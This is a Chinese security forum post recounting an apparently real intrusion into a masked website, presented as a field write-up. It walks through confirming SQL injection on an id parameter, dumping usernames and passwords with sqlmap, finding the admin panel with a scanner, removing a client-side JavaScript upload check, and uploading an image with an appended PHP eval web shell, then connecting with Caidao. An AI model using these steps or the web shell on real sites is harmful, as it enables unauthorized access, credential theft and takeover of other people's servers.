安全矩阵

 找回密码
 立即注册
搜索
查看: 1356|回复: 0

记录一次实战,注入+本地JS绕过拿shell

[复制链接]

252

主题

252

帖子

1307

积分

金牌会员

Rank: 6Rank: 6

积分
1307
发表于 2022-7-29 00:11:47 | 显示全部楼层 |阅读模式
原文链接:记录一次实战,注入+本地JS绕过拿shell


正文

1.找注入点


2.测试是否有注入:

http://xxxxxx/xxxx.php?id=6’ ,没有回显


输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。

3. 使用sqlmap跑。

sqlmap.py -u “http://xxxxx/xxxx.php?id=6”


发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。



我们先上传一个脚本木马试试。


发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。


我们找到表单form,删除相对应的脚本。


5.重新上传php一句话,发现


那么试下图片马

6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>



保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 03:01 , Processed in 0.013674 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表